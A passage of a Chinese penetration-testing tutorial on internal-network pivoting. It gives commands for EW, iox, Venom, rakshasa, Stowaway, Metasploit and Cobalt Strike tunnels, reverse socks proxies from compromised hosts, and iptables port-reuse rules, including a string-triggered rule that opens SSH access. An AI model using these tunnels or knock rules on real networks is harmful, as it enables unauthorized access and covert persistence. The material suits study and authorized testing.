该场景使用不多，但是和TCP端口映射一个原理，比如53端口是DNS服务器端口，DNS使用UDP协议 我们可以把内网的DNS服务器的IP映射到公网服务器上的自定义端口，这样把DNS服务器设置为公网的服务器就可以使用内网的DNS服务器进行解析

搭建HTTP正向代理

我们使用公网的8888端口作为HTTP代理访问内网网站

423K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8S2b7h3y4x3h3p5u0m8b7f1y4p5x3$3S2v1g2K6S2i4z5o6l9J5x3q4)9J5k6i4m8F1k6H3`.`." alt="image.png" />

使用proxifier设置HTTP代理或者直接用浏览器插件设置都可以 这时访问内网网站的地址，验证客户端账号密码

8c0K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8S2b7f1E0d9j5f1W2m8b7f1q4Q4x3X3c8&6x3s2m8g2N6K6m8m8x3o6R3^5i4K6u0W2M7r3&6Y4" alt="image.png" />

访问成功

dcaK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8S2b7h3c8J5M7q4y4m8b7f1y4y4f1W2q4K6g2s2b7%4z5o6M7^5x3#2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

搭建SSH私密代理

其实就是加密的TCP隧道，为了防止其他人使用 配置好目标机器和秘钥

099K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8S2b7f1c8d9y4X3S2m8b7f1u0Q4y4h3k6S2K9V1!0o6e0%4S2q4y4U0l9@1i4K6u0W2M7r3&6Y4" alt="image.png" />

点击加号会出现远程端命令，这个命令例如A想通过VPS连接内网的B，那么这条命令是A来执行

f99K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8S2b7f1A6*7y4K6q4m8b7f1u0K9c8h3j5^5K9@1!0H3j5K6R3H3y4g2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

执行之后会显示将端口绑定在本地的2000端口上

049K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8S2b7g2A6b7K9s2u0m8b7f1u0H3L8$3y4y4i4K6u0V1b7h3&6C8x3K6j5#2i4K6u0W2M7r3&6Y4" alt="image.png" />

mstsc访问本地2000端口即可

689K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8S2b7f1#2F1c8q4A6m8b7f1y4G2h3f1x3H3x3p5H3I4z5o6j5J5x3W2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

如果想自定义本地绑定端口可以用以下命令

npc -server=192.168.3.128:8024 -vkey=mxkt13ximrr7o3d2 -type=tcp -password=123456 -local_type=secret -local_port=8888

EW

ew 全称是 EarchWorm，是一套轻量便携且功能强大的网络穿透工具，基于标准 C 开发，具有 socks5 代理、端口转发和端口映射三大功能，可在复杂网络环境下 完成网络穿透，且支持全平台(Windows/Linux/Mac)。 但是该应用官网现已下架，但在github仍可搜到。 这个工具说实话命令晦涩难懂，实际中对大型网络的渗透没必要用，有其他好用的代理软件，并且已经被杀毒软件标记，把最基本的正反向代理学会即可，其他命令没必要深究。

EW正向代理

Web服务器的设置 如果是Linux系统 ./ew_for_linux64 -s ssocksd -l 1080 #监听本地的1080端口

如果是Windows系统 ew_for_Win.exe -s ssocksd -l 1080 #监听本地的1080端口 主机的设置 如果是Linux系统，配置proxychains代理链的配置文件，将代理设置成 100.100.10.12的1080端口：socks5 100.100.10.12 1080 然后命令前面加上 proxychains即可。如：proxychains curl 192.168.10.19 如果是Windows系统，直接浏览器中设置代理为 100.100.10.12的1080端口，或者利用 Proxifier 、sockscap64 设置全局代理

EW反向代理

Web服务器的设置 Linux系统： ./ew_for_linux64 -s rssocks -d 100.100.10.13 -e 8888 #将本机的流量全部转发到100.100.10.13的8888端口 Windows系统： ew_for_Win.exe -s rssocks -d 100.100.10.13 -e 8888 #将本机的流量全部转发到100.100.10.13的8888端口 主机的设置 如果是Linux系统： ./ew_for_linux64 -s rcsocks -l 1080 -e 8888 #将本机的8888端口的流量都转发给1080端口，这里8888端口只是用于传输流量 然后配置proxychains代理链的配置文件，将代理设置成 127.0.0.1的1080端口：socks5 127.0.0.1 1080 然后命令前面加上 proxychains即可。如：proxychains curl 192.168.10.19 如果是Windows系统 ew_for_Win.exe -s rcsocks -l 1080 -e 8888 #将本机的8888端口的流量都转发给1080端口，这里8888端口只是用于传输流量 然后浏览器中设置代理为 100.100.10.12的1080端口，或者利用 Proxifier 、sockscap64 设置全局代理

IOX

端口转发 & 内网代理工具，功能类似于lcx/ew，但是比它们更好

为什么写iox?

lcx和ew是很优秀的工具，但还可以提高 在最初使用它们的很长一段时间里，我都记不住那些复杂的命令行参数，诸如tran, slave, rcsocks, sssocks。工具的工作模式很清晰，明明可以用简单的参数表示，为什么他们要设计成这样（特别是ew的-l -d -e -f -g -h） 除此之外，我认为网络编程的逻辑可以优化 举个栗子，当运行lcx -listen 8888 9999命令时，客户端必须先连:8888，再连:9999，实际上这两个端口是平等的，在iox里则没有这个限制。当运行lcx -slave 1.1.1.1 8888 1.1.1.1 9999命令时，lcx会串行的连接两个主机，但是并发连接两个主机会更高效，毕竟是纯I/O操作，iox就是这样做的 更进一步，iox提供了流量加密功能 (当目标有IDS时会很有用)。实际上，你可以直接将iox当做一个简易的ShadowSocks使用 iox还提供了UDP流量转发的功能 当然，因为iox是用Go写的，所以静态连接的程序有一点大，原程序有2.2MB（UPX压缩后800KB）

特性

• 流量加密（可选）
• 友好的命令行参数
• 逻辑优化
• UDP流量转发
• 反向代理模式中使用TCP多路复用

工作模式

fwd

监听 0.0.0.0:8888 和0.0.0.0:9999，将两个连接间的流量转发

./iox fwd -l 8888 -l 9999

监听本地 8888 端口和 9999 端口，将两个连接间的流量进行转发，流量加密

./iox fwd -l *8888 -l *9999 -k 656565

监听0.0.0.0:8888，把流量转发到1.1.1.1:9999

./iox fwd -l 8888 -r 1.1.1.1:9999

连接1.1.1.1:8888和1.1.1.1:9999, 在两个连接间转发

./iox fwd -r 1.1.1.1:8888 -r 1.1.1.1:9999

利用iox进行端口映射

vps开启监听

./iox fwd -l *4455 -l 3389 -k 656565

内网主机进行端口转发

iox.exe fwd -r 192.168.3.131:3389 -r *192.168.3.128:8888 -k 656565

成功连接

63bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8S2b7f1q4D9x3h3u0m8b7f1c8U0x3r3D9K6f1q4y4H3e0e0l9@1y4g2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

proxy

socks5 反向代理 vps执行

./iox proxy -l *9999 -l *1080 -k 656565

内网机器执行

iox.exe proxy -r *192.168.3.128:9999 -k 656565

2c4K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8S2b7f1N6K6e0%4g2m8b7f1y4$3i4K6u0V1P5Y4y4C8e0%4V1H3y4e0p5&6i4K6u0W2M7r3&6Y4" alt="image.png" />

Venom

Venom 是一款为渗透测试人员设计的使用 Go 开发的多级代理工具。Venom可将多个节点进行连接，然后以节点为跳板，构建多级代理。渗透测试人员可以使用Venom 轻松地将网络流量代理到多层内网，并轻松地管理代理节点。 项目地址：GitHub - Dliv3/Venom: Venom - A Multi-hop Proxy for Penetration Testers 具体的命令参数请看项目地址介绍，这里只列出常用的命令

一级代理

反向socks代理 vps进行监听 admin.exe -lport 7777

ea7K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8S2b7h3k6%4c8e0W2m8b7f1u0x3N6e0u0b7y4h3q4u0M7K6V1@1z5g2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

客户端进行连接 .\agent.exe -rhost 192.168.3.1 -rport 7777

c83K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8S2b7h3k6$3x3U0q4m8b7f1q4H3x3f1q4E0x3V1k6n7g2e0R3J5y4W2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

admin收到连接使用Show命令刷新节点数量，发现1节点

81cK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8W2b7f1u0Z5z5r3q4m8b7f1u0o6h3h3u0u0k6#2c8u0g2e0V1$3x3q4)9J5k6i4m8F1k6H3`.`." alt="image.png" />

使用goto命令跳转到1节点，使用socks命令在vps建立1080端口代理

b30K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8W2b7f1y4p5c8Y4k6m8b7f1u0F1h3V1y4W2e0X3c8f1x3o6M7H3x3q4)9J5k6i4m8F1k6H3`.`." alt="image.png" />

成功连接

d78K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8W2b7f1x3&6c8q4)9#2k6V1q4m8c8p5k6F1y4Y4N6k6f1%4S2c8x3K6p5@1i4K6u0W2M7r3&6Y4" alt="image.png" />

使用shell命令可在节点上开启交互式shell窗口 exit命令退出

81eK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8W2b7f1W2U0x3g2y4m8b7f1c8B7c8#2m8E0K9s2W2k6M7K6p5K6z5g2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

配置主机的备注

206K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8W2b7f1!0K6P5V1A6m8b7f1q4X3h3r3S2u0h3f1&6b7c8e0b7J5x3q4)9J5k6i4m8F1k6H3`.`." alt="image.png" />

正向socks代理 在目标主机使用agent进行监听 .\agent.exe -lport 8888 vps使用admin正向连接 admin.exe -rhost 192.168.3.131 -rport 8888

333K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8W2b7h3p5$3b7@1#2m8b7f1c8A6c8@1)9$3d9r3y4Q4x3X3c8G2y4o6M7#2i4K6u0W2M7r3&6Y4" alt="image.png" />

二级代理

在已经拿下一台内网A主机的基础上，想通过A主机连接B主机 反向连接 A节点使用listen命令监听端口

348K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8W2b7f1I4c8j5%4c8m8b7f1q4K6y4@1E0W2d9p5I4$3c8e0t1$3y4#2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

b主机进行反向连接成功连接

c59K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8W2b7g2y4K9f1h3&6m8b7f1u0k6g2Y4g2a6i4K6u0V1y4@1u0y4z5e0f1K6i4K6u0W2M7r3&6Y4" alt="image.png" />

正向连接 B节点开启监听，A节点主动连接

c7dK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8W2b7g2q4U0x3r3u0m8b7f1u0E0M7e0q4m8d9r3c8i4f1e0x3K6z5g2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

如果目标主机是linux可以建立ssh隧道，目标机器开启监听

abcK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8W2b7f1N6J5b7%4k6m8b7f1q4$3c8V1!0K9h3h3&6e0d9e0t1^5y4g2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

使用1节点 sshconnect连接，注意这里运行admin的vps必须要有ssh服务才能连接，否则连接时会报unknown choice

40fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8W2b7f1^5H3L8f1E0m8b7f1u0A6L8e0c8*7x3h3E0T1c8e0p5&6x3g2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

upload命令上传文件到目标机器

a39K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8W2b7f1y4j5f1s2g2m8b7f1u0K6x3i4m8r3N6K6g2z5k6K6b7%4z5q4)9J5k6i4m8F1k6H3`.`." alt="image.png" />

download命令同理这里不在赘述 lforward 将vps端口转发到node节点，例如将vps 3389转发到Node节点3389

lforward 127.0.0.1 3389 3389

rforward 将node节点转发到vps 3389

rforward 127.0.0.1 3389 3389

以上两个端口转发内网其他地址也可以 学习了二级代理后多级代理是一个原理不在赘述

rakshasa

rakshasa是一个用Go编写的程序，旨在创建一个能够实现 多级代理 ，内网穿透网络请求。它可以在节点群中任意两个节点之间转发tcp请求和响应，同时支持 socks5代理 ， http代理 ，并可 引入外部http、socks5代理池，自动切换请求ip 。 节点之间使用内置证书的TLS加密TCP通信，再叠加一层自定义秘钥的AES加密。该程序可在所有Go支持的平台上使用，包括Windows和Linux服务器。 项目地址：GitHub - Mob2003/rakshasa: 基于go编写的跨平台、稳定、隐秘的多级代理内网穿透工具

43aK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8A6b7f1W2u0h3p5c8m8b7f1c8T1g2e0q4z5f1U0m8j5M7K6t1&6y4q4)9J5k6i4m8F1k6H3`.`." alt="image.png" />

为了方便演示，这里全部用的 **fullnode ** 分为CLI模式和非CLI模式，如果使用CLI模式用法比较直观简单，去看演示文档即可不再累赘

f9eK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6y4L8$3t1J5x3o6l9K6i4K6u0r3M7X3q4C8M7$3S2S2M7$3q4Q4x3V1k6T1L8r3!0T1i4K6u0r3L8h3q4A6L8W2)9J5c8Y4u0W2j5h3c8E0k6g2)9J5c8Y4u0S2K9%4y4Z5j5i4y4S2i4K6t1#2c8e0W2Q4x3U0g2m8x3g2)9J5y4f1t1&6i4K6t1#2c8e0N6Q4x3U0f1&6b7W2)9J5y4f1q4q4i4K6t1#2c8e0S2Q4x3U0g2m8c8g2)9J5y4f1u0q4i4K6t1#2c8e0S2Q4x3U0g2m8c8g2)9J5y4f1p5I4i4K6u0W2L8h3b7`.

Stowaway

Stowaway是一个利用go语言编写、专为渗透测试工作者制作的多级代理工具 用户可使用此程序将外部流量通过多个节点代理至内网，突破内网访问限制，构造树状节点网络，并轻松实现管理功能

一级代理

vps开启监听 .\windows_x64_agent.exe -c 192.168.3.1:6666 --reconnect 5

windows_x64_admin.exe -l 6666

内网主机连接vps，每五秒重发一次

.\windows_x64_agent.exe -c 192.168.3.1:6666 --reconnect 5

560K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4z5q4)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8A6b7f1W2b7x3X3g2m8b7f1g2y4y4K6N6I4c8r3q4j5N6K6j5J5x3W2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

查看一下详细信息和本节点下的拓扑结构

6c1K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4z5q4)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8A6b7f1u0d9h3W2N6m8b7f1p5H3x3X3u0Q4x3X3c8^5i4K6u0V1N6#2f1@1x3U0N6Q4x3X3g2H3L8X3M7`." alt="image.png" />

使用0节点，开启socks和关闭socks

ca9K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4z5q4)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8A6b7f1g2S2P5s2q4m8b7f1y4V1y4g2q4B7N6$3u0b7b7e0j5$3z5q4)9J5k6i4m8F1k6H3`.`." alt="image.png" />

执行shell命令

3adK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4z5q4)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8A6b7f1M7@1y4r3u0m8b7f1u0X3k6g2)9#2k6W2W2j5d9X3W2u0z5e0M7H3i4K6u0W2M7r3&6Y4" alt="image.png" />

二级代理

想通过node 0节点连接其他节点，先在node 0节点监听8888端口

f8eK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4z5q4)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8A6b7g2y4#2K9e0c8m8b7f1u0e0K9q4A6^5j5h3S2K6N6K6j5I4x3q4)9J5k6i4m8F1k6H3`.`." alt="image.png" />

内网主机进行连接

./linux_x64_agent -c 192.168.3.131:8888

6d4K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4z5q4)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8A6b7h3y4b7x3s2N6m8b7f1u0X3y4i4W2h3f1g2c8f1h3e0f1I4x3W2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

MSF与CS隧道搭建与端口转发

运行以下命令自动添加路由

run post/multi/manage/autoroute OPTION=value

09eK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4z5q4)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8A6b7f1!0%4c8q4c8m8b7f1t1J5e0@1q4J5x3W2y4K6L8K6M7J5y4W2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

查看路由

route print

174K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4z5q4)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8A6b7h3g2r3c8i4c8m8b7f1u0a6d9i4A6H3f1#2q4s2j5K6M7I4y4#2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

这个路由是msf全局的，不是局限于某个session，添加好路由之后开启socks代理即可

se auxiliary/server/socks_proxy
set version 4a
set SRVHOST 0.0.0.0
set SRVPORT 1080
run

将目标主机的3389转发到本地的3389，需要先 load stdapi

portfwd add -l 3389 -r 192.168.3.131 -p 3389

870K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4z5q4)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8A6b7f1M7J5d9K6m8m8b7f1u0j5b7W2m8x3P5V1y4x3M7K6V1H3y4#2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

cs端口转发，将远程的3333转发给自己的889

rportfwd 3333 127.0.0.1 889

端口复用

网上有很多，包括iptables，winrm，以及脚本的代理转发等，出了iptables感觉实用性都不大，因此这里只写iptables 当一个linux系统只允许80端口入网，就需要做端口复用，当然我认为使用http隧道做端口转发也可以

根据源地址做端口复用

将192.168.3.1访问80端口的流量都转发到22端口

iptables -t nat -A PREROUTING -p tcp -s 192.168.3.1 --dport 80 -j REDIRECT --to-port 22

查看nat表规则

iptables -t nat -nvL

清除nat表规则

iptables -t nat -F

此时已经添加成功

e0cK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4z5q4)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8A6b7h3c8w2N6p5g2m8b7f1c8C8M7o6c8v1j5U0S2F1M7K6p5I4y4g2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

这时连接80是能连接的

330K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4z5q4)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8A6b7f1k6K6b7e0m8m8b7f1c8V1b7U0N6g2i4K6g2X3f1%4N6%4x3e0f1%4i4K6u0W2M7r3&6Y4" alt="image.png" />

利用tcp协议做遥控开关

创建端口复用链

iptables -t nat -N LETMEIN2

创建端口复用规则，将流量转发至 22 端

iptables -t nat -A LETMEIN2 -p tcp -j REDIRECT --to-port 22

开启开关，如果接收到一个含有 threathuntercoming 的 TCP 包，则将来源 IP 添加到 加为 letmein2 的列表中

iptables -A INPUT -p tcp -m string --string 'threathuntercoming' --algo bm -m recent --set --name LETMEIN2 --rsource -j ACCEPT

关闭开关，如果接收到一个含有 threathunterleaving 的 TCP 包，则将来源 IP 从 letmein2 的列表中移出

